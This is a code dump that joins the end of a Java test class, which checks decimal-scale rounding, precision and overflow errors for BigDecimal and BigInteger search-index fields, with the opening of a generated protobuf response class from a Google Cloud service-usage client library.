.hasMessageContainingAll( "Invalid index field type: decimal scale '3' is positive", "The decimal scale of BigInteger fields must be zero or negative" ); } @Test void decimalScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // decimal scale is 3, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.111 matchGreaterThan( index, new BigDecimal( "739.11" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.111" ) ); } @Test void decimalScale_zeroScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // decimal scale is 0, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739 matchGreaterThan( index, new BigDecimal( "738" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739" ) ); } @Test void decimalScale_zeroScale_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "739" ) ) ); // decimal scale is 0, affecting the search precision // so the provided value 739 will be treated as if it were 739 matchGreaterThan( index, new BigInteger( "738" ) ); doNotMatchGreaterThan( index, new BigInteger( "739" ) ); } @Test void decimalScale_negativeScale_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, -3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "11111.11111" ) ) ); // decimal scale is -3, affecting the search precision // so the provided value 11111.11111 will be treated as if it were 11000 matchGreaterThan( index, new BigDecimal( "10000" ) ); doNotMatchGreaterThan( index, new BigDecimal( "11000" ) ); } @Test void decimalScale_negativeScale_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "11111" ) ) ); // decimal scale is -3, affecting the search precision // so the provided value 11111 will be treated as if it were 11000 matchGreaterThan( index, new BigInteger( "10000" ) ); doNotMatchGreaterThan( index, new BigInteger( "11000" ) ); } @Test void decimalScale_largeScale_bigDecimal() { final int schemaDecimalScale = 275; SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. * * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^-275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^-275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^-275 */ BigDecimal originalValue = bigDecimalWithOnes( INDEX_PRECISION, 50, schemaDecimalScale ); BigDecimal estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ); BigDecimal indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); BigDecimal indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_negativeScale_largeScale_bigDecimal() { final int schemaDecimalScale = -275; SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. * * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^275 */ BigDecimal originalValue = bigDecimalWithOnes( INDEX_PRECISION, 5, schemaDecimalScale ); BigDecimal estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ); BigDecimal indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); BigDecimal indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ) ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_negativeScale_largeScale_bigInteger() { final int schemaDecimalScale = -275; SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, schemaDecimalScale ) ); setupHelper.start().withIndex( index ).setup(); /* * Use extra digits in the original value, which will be assumed to be lost during indexing. * * The original value will look like this: * * 111111111111(...)111111.11111(...)111 * 10^275 * * The indexed value lower bound will look like this: * * 111111111111(...)111110.0 * 10^275 * * The indexed value upper bound will look like this: * * 111111111111(...)111112.0 * 10^275 */ BigInteger originalValue = bigDecimalWithOnes( INDEX_PRECISION, 100, schemaDecimalScale ).toBigIntegerExact(); BigInteger estimatedIndexedValue = bigDecimalWithOnes( INDEX_PRECISION, 0, schemaDecimalScale ).toBigIntegerExact(); BigInteger indexedValueLowerBound = estimatedIndexedValue.subtract( new BigDecimal( BigInteger.ONE, schemaDecimalScale ).toBigIntegerExact() ); BigInteger indexedValueUpperBound = estimatedIndexedValue.add( new BigDecimal( BigInteger.ONE, schemaDecimalScale ).toBigIntegerExact() ); assertThat( originalValue ) .isBetween( indexedValueLowerBound, indexedValueUpperBound ); index.index( "1", doc -> doc.addValue( index.binding().scaled, originalValue ) ); matchGreaterThan( index, indexedValueLowerBound ); doNotMatchGreaterThan( index, indexedValueUpperBound ); } @Test void decimalScale_rounding_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); index.bulkIndexer() .add( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.114999" ) ) ) .add( "2", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.115" ) ) ) .add( "3", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11" ) ) ) .add( "4", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.12" ) ) ) .join(); // RoundingMode.HALF_UP expected on both values: match( index, new BigDecimal( "739.11" ), "1", "3" ); match( index, new BigDecimal( "739.12" ), "2", "4" ); // and parameters: match( index, new BigDecimal( "739.114999" ), "1", "3" ); match( index, new BigDecimal( "739.115" ), "2", "4" ); } @Test void decimalScale_rounding_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -4 ) ); setupHelper.start().withIndex( index ).setup(); index.bulkIndexer() .add( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7394999" ) ) ) .add( "2", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7395000" ) ) ) .add( "3", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7390000" ) ) ) .add( "4", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7400000" ) ) ) .join(); // RoundingMode.HALF_UP expected on both values: match( index, new BigInteger( "7390000" ), "1", "3" ); match( index, new BigInteger( "7400000" ), "2", "4" ); // and parameters: match( index, new BigInteger( "7394999" ), "1", "3" ); match( index, new BigInteger( "7395000" ), "2", "4" ); } @Test void decimalScale_largeDecimal_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // That seems a limit for ES. Even if new BigDecimal( "2" ).pow( 54 ) << Long.MAX_VALUE // If the exponent were 54, the test would fail for Elasticsearch, whereas it would work for Lucene backend. BigDecimal largeDecimal = new BigDecimal( "2" ).pow( 53 ); index.index( "1", doc -> doc.addValue( index.binding().scaled, largeDecimal ) ); // the precision is supposed to be preserved matchGreaterThan( index, largeDecimal.subtract( BigDecimal.ONE ) ); doNotMatchGreaterThan( index, largeDecimal ); } @Test void decimalScale_largeDecimal_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // That seems a limit for ES. Even if new BigDecimal( "2" ).pow( 54 ) << Long.MAX_VALUE // If the exponent were 54, the test would fail for Elasticsearch, whereas it would work for Lucene backend. BigInteger largeInteger = new BigInteger( "2" ).pow( 53 ); index.index( "1", doc -> doc.addValue( index.binding().scaled, largeInteger ) ); // the precision is supposed to be preserved matchGreaterThan( index, largeInteger.subtract( BigInteger.ONE ) ); doNotMatchGreaterThan( index, largeInteger ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ).multiply( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal_queryPredicateBuildTime() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); BigDecimal veryLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = veryLargeDecimal.multiply( BigDecimal.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeDecimal ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atMost( tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigDecimal_lowerBound() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).multiply( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ).multiply( BigInteger.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger_lowerBound() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = BigInteger.valueOf( Long.MIN_VALUE ).multiply( BigInteger.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale0_bigInteger_lowerBound_queryPredicateBuildTime() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, 0 ) ); setupHelper.start().withIndex( index ).setup(); BigInteger veryLargeNegativeInteger = BigInteger.valueOf( Long.MIN_VALUE ); // Provide a value that cannot be represented as a long BigInteger tooLargeInteger = veryLargeNegativeInteger.multiply( BigInteger.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeNegativeInteger ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atLeast( tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MAX_VALUE ).divide( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal_lowerBound() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).divide( BigDecimal.TEN ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scale2_bigDecimal_lowerBound_queryPredicateBuildTime() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were divided by 10, could not be represented as a long, because the scale of 2 BigDecimal tooLargeDecimal = BigDecimal.valueOf( Long.MIN_VALUE ).divide( BigDecimal.TEN ); BigDecimal veryLargeDecimal = tooLargeDecimal.divide( BigDecimal.TEN ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeDecimal ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atLeast( tooLargeDecimal ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeDecimal.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ).multiply( new BigInteger( "1000" ) ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger_queryPredicateBuildTime() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); BigInteger veryLargeInteger = BigInteger.valueOf( Long.MAX_VALUE ); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = veryLargeInteger.multiply( new BigInteger( "1000" ) ); index.index( "1", doc -> doc.addValue( index.binding().scaled, veryLargeInteger ) ); assertThatThrownBy( () -> index.createScope() .query().selectEntityReference() .where( p -> p.range().field( "scaled" ).atMost( tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void decimalScale_tooLargeDecimal_scaleMinus2_bigInteger_lowerBound() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -2 ) ); setupHelper.start().withIndex( index ).setup(); // Provide a value that if it were multiplied by 100, could not be represented as a long, because the scale of -2 BigInteger tooLargeInteger = BigInteger.valueOf( Long.MIN_VALUE ).multiply( new BigInteger( "1000" ) ); assertThatThrownBy( () -> index.index( "1", doc -> doc.addValue( index.binding().scaled, tooLargeInteger ) ) ) .isInstanceOf( SearchException.class ) .hasMessageContainingAll( "Unable to encode value '" + tooLargeInteger.toString() + "'", "this field type only supports values ranging from ", "If you want to encode values that are outside this range," + " change the decimal scale for this field" ); } @Test void defaultDecimalScale_bigDecimal() { SimpleMappedIndex<DefaultDecimalScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( DefaultDecimalScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // default decimal scale is 2, affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.11 matchGreaterThan( index, new BigDecimal( "739.1" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.11" ) ); } @Test void defaultDecimalScale_bigInteger() { SimpleMappedIndex<DefaultIntegerScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( DefaultIntegerScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7391111" ) ) ); // default decimal scale is -2, affecting the search precision // so the provided value 7391111 will be treated as if it were 7391100 matchGreaterThan( index, new BigInteger( "7391000" ) ); doNotMatchGreaterThan( index, new BigInteger( "7391100" ) ); } @Test void decimalScale_andDefaultDecimalScale_bigDecimal() { SimpleMappedIndex<BothDecimalScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( BothDecimalScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // default decimal scale is 2 // decimal scale has been set to 3, overriding the default and affecting the search precision // so the provided value 739.11111 will be treated as if it were 739.111 matchGreaterThan( index, new BigDecimal( "739.11" ) ); doNotMatchGreaterThan( index, new BigDecimal( "739.111" ) ); } @Test void decimalScale_andDefaultDecimalScale_bigInteger() { SimpleMappedIndex<BothIntegerScaleIndexBinding> index = SimpleMappedIndex.ofAdvanced( BothIntegerScaleIndexBinding::new ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "7391111" ) ) ); // default decimal scale is -2, // decimal scale has been set to -3, overriding the default and affecting the search precision // so the provided value 7391111 will be treated as if it were 7391000 matchGreaterThan( index, new BigInteger( "7390000" ) ); doNotMatchGreaterThan( index, new BigInteger( "7391000" ) ); } @Test void decimalScale_doesNotAffectProjections_bigDecimal() { SimpleMappedIndex<DecimalScaleIndexBinding> index = SimpleMappedIndex.of( root -> new DecimalScaleIndexBinding( root, 3 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigDecimal( "739.11111" ) ) ); // even though decimal scale is 3, projected values wont be affected to projection( index, new BigDecimal( "739.11111" ) ); } @Test void decimalScale_doesNotAffectProjections_bigInteger() { SimpleMappedIndex<IntegerScaleIndexBinding> index = SimpleMappedIndex.of( root -> new IntegerScaleIndexBinding( root, -7 ) ); setupHelper.start().withIndex( index ).setup(); index.index( "1", doc -> doc.addValue( index.binding().scaled, new BigInteger( "73911111" ) ) ); // even though decimal scale is -7, projected values wont be affected to projection( index, new BigInteger( "73911111" ) ); } private void matchGreaterThan(StubMappedIndex index, Object value) { assertThatQuery( index.query() .where( p -> p.range().field( "scaled" ).greaterThan( value ) ) ) .hasDocRefHitsAnyOrder( index.typeName(), "1" ); } public void doNotMatchGreaterThan(StubMappedIndex index, Object value) { assertThatQuery( index.query() .where( p -> p.range().field( "scaled" ).greaterThan( value ) ) ) .hasNoHits(); } public void projection(StubMappedIndex index, BigDecimal value) { SearchQuery<Object> query = index.createScope().query() .select( p -> p.field( "scaled" ) ) .where( p -> p.matchAll() ) .toQuery(); assertThatQuery( query ).hasHitsExactOrder( value ); } public void projection(StubMappedIndex index, BigInteger value) { SearchQuery<Object> query = index.createScope().query() .select( p -> p.field( "scaled" ) ) .where( p -> p.matchAll() ) .toQuery(); assertThatQuery( query ).hasHitsExactOrder( value ); } private void match(StubMappedIndex index, Object matching, String match1, String match2) { assertThatQuery( index.query() .where( p -> p.match().field( "scaled" ).matching( matching ) ) ) .hasDocRefHitsAnyOrder( index.typeName(), match1, match2 ); } /** * @param digitsBeforeDot The number of times the digit {@code 1} appears before the decimal dot. * @param digitsAfterDot The number of times the digit {@code 1} appears after the decimal dot. * @param scale The scale of the resulting number. * @return A BigDecimal equal to this number: * {@code <the digit '1' as many times as digitsBeforeDot>.<the digit '1' as many times as digitsAfterDot> * 10^<scale>} */ private static BigDecimal bigDecimalWithOnes(int digitsBeforeDot, int digitsAfterDot, int scale) { BigInteger unscaled = bigIntegerWithOnes( digitsBeforeDot + digitsAfterDot ); return new BigDecimal( unscaled, scale + digitsAfterDot ); } /** * @param oneDigits The number of times the digit {@code 1} appears in most significant digits. * @return A BigInteger equal to this number: * {@code <the digit '1' as many times as oneDigits><the digit '0' as many times as zeroDigits>} */ private static BigInteger bigIntegerWithOnes(int oneDigits) { if ( oneDigits < 1 ) { throw new IllegalArgumentException(); } BigInteger number = BigInteger.ONE; for ( int i = 1 /* we start with one digit */; i < oneDigits; i++ ) { number = number.multiply( BigInteger.TEN ).add( BigInteger.ONE ); } return number; } private static class DecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; DecimalScaleIndexBinding(IndexSchemaElement root, int decimalScale) { scaled = root.field( "scaled", f -> f.asBigDecimal().projectable( Projectable.YES ).decimalScale( decimalScale ) ) .toReference(); } } private static class DefaultDecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; DefaultDecimalScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( 2 ) ).asBigDecimal() ) .toReference(); } } private static class BothDecimalScaleIndexBinding { IndexFieldReference<BigDecimal> scaled; BothDecimalScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() // setting both default decimal scale .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( 2 ) ) // and the not-default decimal scale .asBigDecimal().decimalScale( 3 ) ) .toReference(); } } private static class IntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; IntegerScaleIndexBinding(IndexSchemaElement root, int decimalScale) { scaled = root.field( "scaled", f -> f.asBigInteger().projectable( Projectable.YES ).decimalScale( decimalScale ) ) .toReference(); } } private static class DefaultIntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; DefaultIntegerScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( -2 ) ).asBigInteger() ) .toReference(); } } private static class BothIntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; BothIntegerScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() // setting both default decimal scale .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( -2 ) ) // and the not-default decimal scale .asBigInteger().decimalScale( -3 ) ) .toReference(); } } }
googleapis/google-cloud-java
35,754
java-service-usage/proto-google-cloud-service-usage-v1/src/main/java/com/google/api/serviceusage/v1/ListServicesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/api/serviceusage/v1/serviceusage.proto // Protobuf Java Version: 3.25.8 package com.google.api.serviceusage.v1; /** * * * <pre> * Response message for the `ListServices` method. * </pre> * * Protobuf type {@code google.api.serviceusage.v1.ListServicesResponse} */ public final class ListServicesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.api.serviceusage.v1.ListServicesResponse) ListServicesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListServicesResponse.newBuilder() to construct. private ListServicesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListServicesResponse() { services_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListServicesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.api.serviceusage.v1.ListServicesResponse.class, com.google.api.serviceusage.v1.ListServicesResponse.Builder.class); } public static final int SERVICES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.api.serviceusage.v1.Service> services_; /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public java.util.List<com.google.api.serviceusage.v1.Service> getServicesList() { return services_; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesOrBuilderList() { return services_; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public int getServicesCount() { return services_.size(); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public com.google.api.serviceusage.v1.Service getServices(int index) { return services_.get(index); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public com.google.api.serviceusage.v1.ServiceOrBuilder getServicesOrBuilder(int index) { return services_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; 